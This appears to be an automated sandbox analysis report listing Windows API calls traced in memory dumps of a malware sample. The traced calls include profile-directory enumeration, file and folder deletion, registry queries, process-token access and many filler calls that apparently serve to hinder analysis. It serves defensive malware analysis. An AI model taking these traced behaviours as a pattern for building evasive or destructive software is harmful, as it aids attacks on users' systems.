    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 00401E30
    • HeapAlloc.KERNEL32(00000000), ref: 00401E39
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 00401E41
    • HeapAlloc.KERNEL32(00000000), ref: 00401E44
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 00401E4C
    • HeapAlloc.KERNEL32(00000000), ref: 00401E4F
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 00401EB2
    • HeapAlloc.KERNEL32(00000000), ref: 00401EB5
    • GetCurrentProcessId.KERNEL32 ref: 00401ECC
    • GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00401F59
    • HeapAlloc.KERNEL32(00000000), ref: 00401F5C
    • GetCurrentProcessId.KERNEL32 ref: 00401F73
    • GetProfilesDirectoryW.USERENV(?,00000104), ref: 00401FA9
    • wsprintfW.USER32 ref: 00401FC6
    • FindFirstFileW.KERNEL32(?,?), ref: 00401FD9
    • StrCmpW.SHLWAPI(?,004104E4), ref: 00401FF9
    • StrCmpW.SHLWAPI(?,004104E8), ref: 00402013
    • StrCpyW.SHLWAPI(?,?), ref: 0040204E
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00402058
    • HeapAlloc.KERNEL32(00000000), ref: 0040205B
    • GetProcessWindowStation.USER32 ref: 00402072
    • StrCatW.SHLWAPI(?,00000000), ref: 0040209D
    • GetProcessHeap.KERNEL32(00000008,00000025), ref: 004020D8
    • HeapAlloc.KERNEL32(00000000), ref: 004020DB
    • GetDoubleClickTime.USER32 ref: 004020EF
    • wsprintfW.USER32 ref: 0040212A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402145
    • HeapFree.KERNEL32(00000000), ref: 0040214E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00402156
    • HeapFree.KERNEL32(00000000), ref: 00402159
    • FindNextFileW.KERNEL32(00000000,?), ref: 00402179
    • FindClose.KERNEL32(00000000), ref: 00402184
    • GetProcessHeap.KERNEL32(00000008,00000049), ref: 004021F2
    • HeapAlloc.KERNEL32(00000000), ref: 004021F5
    • GetDialogBaseUnits.USER32 ref: 00402209
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00402238
      • Part of subcall function 0040DDBF: lstrlenW.KERNEL32(?,00000001,00000000,?), ref: 0040DDE5
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040DDFA
      • Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DDFD
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE20
      • Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DE23
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000250), ref: 0040DE3A
      • Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DE3D
      • Part of subcall function 0040DDBF: lstrcpyW.KERNEL32(?,00000001), ref: 0040DE55
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040DE70
      • Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DE73
      • Part of subcall function 0040DDBF: GetProcessWindowStation.USER32 ref: 0040DE87
      • Part of subcall function 0040DDBF: lstrcatW.KERNEL32(?,00000000), ref: 0040DEB8
      • Part of subcall function 0040DDBF: lstrcpyW.KERNEL32(00402247,00000001), ref: 0040DEC4
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040DEF5
      • Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DEF8
      • Part of subcall function 0040DDBF: GetOpenClipboardWindow.USER32 ref: 0040DF0C
      • Part of subcall function 0040DDBF: lstrcatW.KERNEL32(00402247,00000000), ref: 0040DF3D
      • Part of subcall function 0040DDBF: FindFirstFileW.KERNEL32(00402247,?), ref: 0040DF47
      • Part of subcall function 0040DDBF: lstrlenW.KERNEL32(79146553), ref: 0040DF7F
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,314C5341), ref: 0040DF9A
      • Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040DF9D
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DFAC
      • Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DFAF
      • Part of subcall function 0040DDBF: lstrcpyW.KERNEL32(00000000,313F5356), ref: 0040DFCA
      • Part of subcall function 0040DDBF: lstrcatW.KERNEL32(314C5341,?), ref: 0040DFD4
      • Part of subcall function 0040DDBF: lstrcatW.KERNEL32(314C5341,79146553), ref: 0040DFED
      • Part of subcall function 0040DDBF: RemoveDirectoryW.KERNEL32(314C5341), ref: 0040E014
      • Part of subcall function 0040DDBF: DeleteFileW.KERNEL32(314C5341), ref: 0040E01F
      • Part of subcall function 0040DDBF: FindNextFileW.KERNEL32(sb0aVS,?), ref: 0040E035
      • Part of subcall function 0040DDBF: GetLastError.KERNEL32 ref: 0040E051
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E05D
      • Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E066
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E06B
      • Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E06E
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,77043129), ref: 0040E075
      • Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E078
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,00402247), ref: 0040E082
      • Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E085
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E091
      • Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E094
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E0A0
      • Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E0A3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00402253
    • HeapFree.KERNEL32(00000000), ref: 0040225C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00402263
    • HeapFree.KERNEL32(00000000), ref: 00402266
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040226D
    • HeapFree.KERNEL32(00000000), ref: 00402270
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402275
    • HeapFree.KERNEL32(00000000), ref: 00402278
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00402280
    • HeapFree.KERNEL32(00000000), ref: 00402283
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040228E
    • HeapFree.KERNEL32(00000000), ref: 00402291
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040C0CB
    • HeapAlloc.KERNEL32(00000000), ref: 0040C0CE
    • IsSystemResumeAutomatic.KERNEL32 ref: 0040C0FA
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040C162
    • HeapAlloc.KERNEL32(00000000), ref: 0040C165
    • GetClipboardSequenceNumber.USER32 ref: 0040C18A
    • GetModuleHandleA.KERNEL32(?,00000000), ref: 0040C1C0
    • GetProcAddress.KERNEL32(00000000), ref: 0040C1C7
    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0040C1E2
    • GetSystemInfo.KERNEL32(?), ref: 0040C1F8
    • GetProcessHeap.KERNEL32(00000008,000000BD), ref: 0040C30F
    • HeapAlloc.KERNEL32(00000000), ref: 0040C312
    • GetDesktopWindow.USER32 ref: 0040C32E
    • RegOpenKeyW.ADVAPI32(80000002,00000000,?), ref: 0040C365
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 0040C3E0
    • HeapAlloc.KERNEL32(00000000), ref: 0040C3E7
    • GetClipboardViewer.USER32 ref: 0040C403
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0040C448
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040C4A1
    • HeapAlloc.KERNEL32(00000000), ref: 0040C4A8
    • CountClipboardFormats.USER32 ref: 0040C4C0
    • StrStrIW.SHLWAPI(?,00000000), ref: 0040C4F8
    • Sleep.KERNEL32(00002710), ref: 0040C505
    • StrStrIW.SHLWAPI(?,00000000), ref: 0040C514
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C51C
    • HeapFree.KERNEL32(00000000), ref: 0040C529
    • RegCloseKey.ADVAPI32(?), ref: 0040C536
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C540
    • HeapFree.KERNEL32(00000000), ref: 0040C547
    • Sleep.KERNEL32(00002710), ref: 0040C56E
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C59A
    • HeapFree.KERNEL32(00000000), ref: 0040C59D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C5A3
    • HeapFree.KERNEL32(00000000), ref: 0040C5A6
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C5B2
    • HeapFree.KERNEL32(00000000), ref: 0040C5B5
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000069,?,00000000,76E6FE8D), ref: 0040A1A4
    • HeapAlloc.KERNEL32(00000000), ref: 0040A1A7
    • ReleaseCapture.USER32 ref: 0040A1C2
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0040A1F5
    • GetShortPathNameW.KERNEL32(?,?,00000104), ref: 0040A206
    • GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0040A258
    • HeapAlloc.KERNEL32(00000000), ref: 0040A25B
    • GetForegroundWindow.USER32 ref: 0040A272
    • wsprintfW.USER32 ref: 0040A2A6
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040A2E6
    • HeapAlloc.KERNEL32(00000000), ref: 0040A2E9
    • RevertToSelf.ADVAPI32 ref: 0040A300
    • CoInitializeEx.OLE32(00000000,00000006), ref: 0040A362
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040A392
    • HeapAlloc.KERNEL32(00000000), ref: 0040A395
    • GetCapture.USER32 ref: 0040A3AC
    • GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040A40B
    • HeapAlloc.KERNEL32(00000000), ref: 0040A40E
    • GetDoubleClickTime.USER32 ref: 0040A422
    • LoadLibraryA.KERNEL32(57495761), ref: 0040A44C
    • GetProcAddress.KERNEL32(00000000), ref: 0040A453
    • GetLastError.KERNEL32 ref: 0040A45D
    • Sleep.KERNEL32(00000064), ref: 0040A46C
    • GetForegroundWindow.USER32 ref: 0040A472
    • CoUninitialize.OLE32 ref: 0040A48B
    • CloseHandle.KERNEL32(?), ref: 0040A494
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A4A3
    • HeapFree.KERNEL32(00000000), ref: 0040A4AC
    • GetProcessHeap.KERNEL32(00000000,57495761), ref: 0040A4B2
    • HeapFree.KERNEL32(00000000), ref: 0040A4B5
    • GetProcessHeap.KERNEL32(00000000,4E5A666B), ref: 0040A4BB
    • HeapFree.KERNEL32(00000000), ref: 0040A4BE
    • GetProcessHeap.KERNEL32(00000000,31653832), ref: 0040A4C4
    • HeapFree.KERNEL32(00000000), ref: 0040A4C7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040A4CD
    • HeapFree.KERNEL32(00000000), ref: 0040A4D0
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
      • Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
      • Part of subcall function 0040D97F: HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
      • Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
      • Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
      • Part of subcall function 0040D97F: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1
    • lstrlenW.KERNEL32(?,00000001,00000000,?), ref: 0040DDE5
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040DDFA
    • HeapAlloc.KERNEL32(00000000), ref: 0040DDFD
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE20
    • HeapAlloc.KERNEL32(00000000), ref: 0040DE23
    • GetProcessHeap.KERNEL32(00000008,00000250), ref: 0040DE3A
    • HeapAlloc.KERNEL32(00000000), ref: 0040DE3D
    • lstrcpyW.KERNEL32(?,00000001), ref: 0040DE55
    • GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040DE70
    • HeapAlloc.KERNEL32(00000000), ref: 0040DE73
    • GetProcessWindowStation.USER32 ref: 0040DE87
    • lstrcatW.KERNEL32(?,00000000), ref: 0040DEB8
    • lstrcpyW.KERNEL32(00402247,00000001), ref: 0040DEC4
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040DEF5
    • HeapAlloc.KERNEL32(00000000), ref: 0040DEF8
    • GetOpenClipboardWindow.USER32 ref: 0040DF0C
    • lstrcatW.KERNEL32(00402247,00000000), ref: 0040DF3D
    • FindFirstFileW.KERNEL32(00402247,?), ref: 0040DF47
    • lstrlenW.KERNEL32(79146553), ref: 0040DF7F
    • lstrcatW.KERNEL32(314C5341,79146553), ref: 0040DFED
    • GetLastError.KERNEL32 ref: 0040E051
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,314C5341), ref: 0040DF9A
      • Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040DF9D
      • Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DFAC
      • Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DFAF
      • Part of subcall function 0040DDBF: lstrcpyW.KERNEL32(00000000,313F5356), ref: 0040DFCA
      • Part of subcall function 0040DDBF: lstrcatW.KERNEL32(314C5341,?), ref: 0040DFD4
      • Part of subcall function 0040DDBF: RemoveDirectoryW.KERNEL32(314C5341), ref: 0040E014
    • DeleteFileW.KERNEL32(314C5341), ref: 0040E01F
    • FindNextFileW.KERNEL32(sb0aVS,?), ref: 0040E035
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E05D
    • HeapFree.KERNEL32(00000000), ref: 0040E066
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E06B
    • HeapFree.KERNEL32(00000000), ref: 0040E06E
    • GetProcessHeap.KERNEL32(00000000,77043129), ref: 0040E075
    • HeapFree.KERNEL32(00000000), ref: 0040E078
    • GetProcessHeap.KERNEL32(00000000,00402247), ref: 0040E082
    • HeapFree.KERNEL32(00000000), ref: 0040E085
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E091
    • HeapFree.KERNEL32(00000000), ref: 0040E094
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E0A0
    • HeapFree.KERNEL32(00000000), ref: 0040E0A3
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • OpenProcess.KERNEL32(02000000,00000000), ref: 00406529
    • ProcessIdToSessionId.KERNEL32(?,?), ref: 00406541
    • OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 0040655F
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00404EA7
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00404EAA
      • Part of subcall function 00404E4E: GetLastError.KERNEL32 ref: 00404EC8
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 00404F61
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00404F64
      • Part of subcall function 00404E4E: GetTickCount.KERNEL32 ref: 00404F7E
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 00404FF4
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00404FF7
      • Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 00405011
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 00405099
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 0040509C
      • Part of subcall function 00404E4E: GetTickCount.KERNEL32 ref: 004050B6
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040513F
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405142
      • Part of subcall function 00404E4E: GetMessageExtraInfo.USER32 ref: 0040515C
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 004051E4
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004051E7
      • Part of subcall function 00404E4E: GetCapture.USER32 ref: 00405201
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040526F
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405272
      • Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 0040528C
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 004052FE
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405301
      • Part of subcall function 00404E4E: GetMessagePos.USER32 ref: 0040531B
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 00405398
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 0040539B
      • Part of subcall function 00404E4E: GetTickCount.KERNEL32 ref: 004053B5
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040542D
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405430
      • Part of subcall function 00404E4E: GetOpenClipboardWindow.USER32 ref: 0040544A
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 004054C5
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004054C8
      • Part of subcall function 00404E4E: DestroyCaret.USER32 ref: 004054E2
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 00405563
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405566
      • Part of subcall function 00404E4E: GetCursor.USER32 ref: 00405580
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 00405611
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405614
      • Part of subcall function 00404E4E: GetInputState.USER32 ref: 0040562E
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 004056B2
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004056B5
      • Part of subcall function 00404E4E: GetMessageExtraInfo.USER32 ref: 004056CC
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 00405758
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 0040575B
      • Part of subcall function 00404E4E: IsSystemResumeAutomatic.KERNEL32 ref: 00405775
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 004057F0
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004057F3
      • Part of subcall function 00404E4E: CountClipboardFormats.USER32 ref: 0040580D
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000013), ref: 00405879
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 0040587C
      • Part of subcall function 00404E4E: GetCurrentProcessId.KERNEL32 ref: 00405893
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00405906
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405909
      • Part of subcall function 00404E4E: GetDesktopWindow.USER32 ref: 00405923
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 004059A5
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004059A8
      • Part of subcall function 00404E4E: GetMenuCheckMarkDimensions.USER32 ref: 004059C2
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000012), ref: 00405A39
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405A3C
      • Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 00405A56
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000012), ref: 00405AC5
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405AC8
      • Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 00405AE2
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001E), ref: 00405B66
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405B69
      • Part of subcall function 00404E4E: GetLogicalDrives.KERNEL32 ref: 00405B83
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00405BFC
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405BFF
      • Part of subcall function 00404E4E: GetFocus.USER32 ref: 00405C19
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 00405C93
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405C96
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32 ref: 00405CAE
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000013), ref: 00405D19
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405D1C
      • Part of subcall function 00404E4E: GetDoubleClickTime.USER32 ref: 00405D36
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000016), ref: 00405DA1
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405DA4
      • Part of subcall function 00404E4E: CountClipboardFormats.USER32 ref: 00405DBB
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 00405E30
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405E33
      • Part of subcall function 00404E4E: GetCaretBlinkTime.USER32 ref: 00405E4A
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00405EC0
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405EC3
      • Part of subcall function 00404E4E: DestroyCaret.USER32 ref: 00405EDA
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00405F50
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405F53
      • Part of subcall function 00404E4E: GetClipboardViewer.USER32 ref: 00405F6D
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00405FE4
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00405FE7
      • Part of subcall function 00404E4E: CloseClipboard.USER32 ref: 00405FFE
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 00406083
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00406086
      • Part of subcall function 00404E4E: GetLastError.KERNEL32 ref: 0040609D
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000014), ref: 0040610F
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00406112
      • Part of subcall function 00404E4E: GetTickCount.KERNEL32 ref: 00406129
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 004061AB
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004061AE
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32 ref: 004061C6
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040622E
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 00406231
      • Part of subcall function 00404E4E: GetClipboardSequenceNumber.USER32 ref: 00406248
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 004062D1
      • Part of subcall function 00404E4E: HeapAlloc.KERNEL32(00000000), ref: 004062D4
      • Part of subcall function 00404E4E: GetCaretBlinkTime.USER32 ref: 004062E8
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406320
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406329
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,dFim7), ref: 00406331
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406334
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,tE0QRzR1xx3vniVk1VKKSNboiOMO5bcEV1I6GBiwPomHXkXxyn0wDEGzdhQff8tsmxSygyxpZPGmv9ZHfdFim7), ref: 0040633E
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406341
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,47505A70), ref: 00406348
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040634B
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,79677953), ref: 00406352
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406355
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,6D737438), ref: 0040635C
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040635F
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,5370665A), ref: 00406369
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040636C
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,47454477), ref: 00406373
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406376
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,6E797858), ref: 0040637D
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406380
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,58486D6F), ref: 00406387
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 0040638A
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,77694247), ref: 00406394
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 00406397
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,667A726A), ref: 004063A1
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063A4
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,6A327676), ref: 004063AE
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063B1
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,7945594C), ref: 004063BB
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063BE
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,53335655), ref: 004063C8
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063CB
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,56696E76), ref: 004063D5
      • Part of subcall function 00404E4E: HeapFree.KERNEL32(00000000), ref: 004063D8
      • Part of subcall function 00404E4E: GetProcessHeap.KERNEL32(00000000,78783152), ref: 004063E2
